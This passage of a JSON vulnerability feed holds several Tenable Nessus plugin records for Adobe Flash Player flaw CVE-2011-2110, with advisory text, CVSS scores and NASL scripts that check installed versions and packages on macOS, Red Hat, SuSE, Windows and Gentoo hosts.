script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\nfixed_version = \"10.3.181.26\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : '+fixed_version+'\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"Flash Player for Mac \"+version+\" is installed and thus not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-01T15:18:41", "description": "An updated Adobe Flash Player package that fixes one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed on the Adobe security page APSB11-18, listed in the References section. Specially crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-2110)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 10.3.181.26.", "cvss3": {"score": null, "vector": null}, "published": "2011-06-16T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2011:0869)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1"], "id": "REDHAT-RHSA-2011-0869.NASL", "href": "https://www.tenable.com/plugins/nessus/55159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0869. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55159);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2110\");\n script_bugtraq_id(48268);\n script_xref(name:\"RHSA\", value:\"2011:0869\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2011:0869)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-18, listed\nin the References section. Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-2110)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.3.181.26.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2110\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb11-18.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb11-18.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0869\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0869\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.3.181.26-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.3.181.26-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-01T15:28:22", "description": "A critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : flash-player (ZYPP Patch Number 7571)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FLASH-PLAYER-7571.NASL", "href": "https://www.tenable.com/plugins/nessus/57192", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57192);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2110\");\n\n script_name(english:\"SuSE 10 Security Update : flash-player (ZYPP Patch Number 7571)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A critical vulnerability has been identified in Adobe Flash Player\n10.3.181.23 and earlier versions for Windows, Macintosh, Linux and\nSolaris, and Adobe Flash Player 10.3.185.23 and earlier versions for\nAndroid. This memory corruption vulnerability (CVE-2011-2110) could\ncause a crash and potentially allow an attacker to take control of the\naffected system. There are reports that this vulnerability is being\nexploited in the wild in targeted attacks via malicious Web pages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7571.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"flash-player-10.3.181.26-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-01T15:18:12", "description": "A critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.", "cvss3": {"score": null, "vector": null}, "published": "2011-06-16T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : flash-player (SAT Patch Number 4715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-110615.NASL", "href": "https://www.tenable.com/plugins/nessus/55162", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55162);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2110\");\n\n script_name(english:\"SuSE 11.1 Security Update : flash-player (SAT Patch Number 4715)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A critical vulnerability has been identified in Adobe Flash Player\n10.3.181.23 and earlier versions for Windows, Macintosh, Linux and\nSolaris, and Adobe Flash Player 10.3.185.23 and earlier versions for\nAndroid. This memory corruption vulnerability (CVE-2011-2110) could\ncause a crash and potentially allow an attacker to take control of the\naffected system. There are reports that this vulnerability is being\nexploited in the wild in targeted attacks via malicious Web pages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=699942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4715.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-10.3.181.26-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:00:23", "description": "Versions of Flash Player earlier than 10.3.181.26 are potentially affected by a memory corruption vulnerability that could allow an attacker to execute arbitrary code subject to the privileges of the user running the affected application. This issue is reportedly being exploited in the wild in targeted attacks as of June 2011. ", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2011-06-06T00:00:00", "type": "nessus", "title": "Flash Player < 10.3.181.26 Code Execution Vulnerability (APSB11-18)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "5967.PRM", "href": "https://www.tenable.com/plugins/nnm/5967", "sourceData": "Binary data 5967.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:29:30", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is earlier than 10.3.181.26. This version of Flash Player has a critical vulnerability. By tricking a user on the affected system into opening a specially crafted document with Flash content, an attacker could leverage the vulnerability to execute arbitrary code remotely on the system subject to the user's privileges. \n\nThis issue is reportedly being exploited in the wild in targeted attacks as of June 2011.", "cvss3": {"score": null, "vector": null}, "published": "2011-06-15T00:00:00", "type": "nessus", "title": "Flash Player < 10.3.181.26 Multiple Vulnerabilities (APSB11-18)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB11-18.NASL", "href": "https://www.tenable.com/plugins/nessus/55140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55140);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-2110\");\n script_bugtraq_id(48268);\n script_xref(name:\"EDB-ID\", value:\"19295\");\n\n script_name(english:\"Flash Player < 10.3.181.26 Multiple Vulnerabilities (APSB11-18)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A browser plugin is affected by a memory corruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is earlier than 10.3.181.26. This version of\nFlash Player has a critical vulnerability. By tricking a user on the\naffected system into opening a specially crafted document with Flash\ncontent, an attacker could leverage the vulnerability to execute\narbitrary code remotely on the system subject to the user's\nprivileges. \n\nThis issue is reportedly being exploited in the wild in targeted\nattacks as of June 2011.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-18.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash version 10.3.181.26 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 3 ||\n (\n iver[1] == 3 &&\n (\n iver[2] < 181 ||\n (iver[2] == 181 && iver[3] < 26)\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (variant == \"Chrome\")\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.3.181.26';\n\n if (variant == \"Chrome\")\n info += ' (as included with Google Chrome 12.0.742.100)';\n\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else\n security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:48:44", "description": "The remote host is affected by the vulnerability described in GLSA-201110-11 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers and Adobe Security Advisories and Bulletins referenced below for details.\n Impact :\n\n By enticing a user to open a specially crafted SWF file a remote attacker could cause a Denial of Service or the execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-14T00:00:00", "type": "nessus", "title": "GLSA-201110-11 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0558", "CVE-2011-0559", "CVE-2011-0560", "CVE-2011-0561", "CVE-2011-0571", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-0574", "CVE-2011-0575", "CVE-2011-0577", "CVE-2011-0578", "CVE-2011-0579", "CVE-2011-0589", "CVE-2011-0607", "CVE-2011-0608", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0619", "CVE-2011-0620", "CVE-2011-0621", "CVE-2011-0622", "CVE-2011-0623", "CVE-2011-0624", "CVE-2011-0625", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0628", "CVE-2011-2107", "CVE-2011-2110", "CVE-2011-2130", "CVE-2011-2134", "CVE-2011-2135", "CVE-2011-2136", "CVE-2011-2137", "CVE-2011-2138", "CVE-2011-2139", "CVE-2011-2140", "CVE-2011-2414", "CVE-2011-2415", "CVE-2011-2416", "CVE-2011-2417", "CVE-2011-2424", "CVE-2011-2425", "CVE-2011-2426", "CVE-2011-2427", "CVE-2011-2428", "CVE-2011-2429", "CVE-2011-2430", "CVE-2011-2444"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-11.NASL", "href": "https://www.tenable.com/plugins/nessus/56504", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-11.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56504);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-0558\",\n \"CVE-2011-0559\",\n \"CVE-2011-0560\",\n \"CVE-2011-0561\",\n \"CVE-2011-0571\",\n \"CVE-2011-0572\",\n \"CVE-2011-0573\",\n \"CVE-2011-0574\",\n \"CVE-2011-0575\",\n \"CVE-2011-0577\",\n \"CVE-2011-0578\",\n \"CVE-2011-0579\",\n 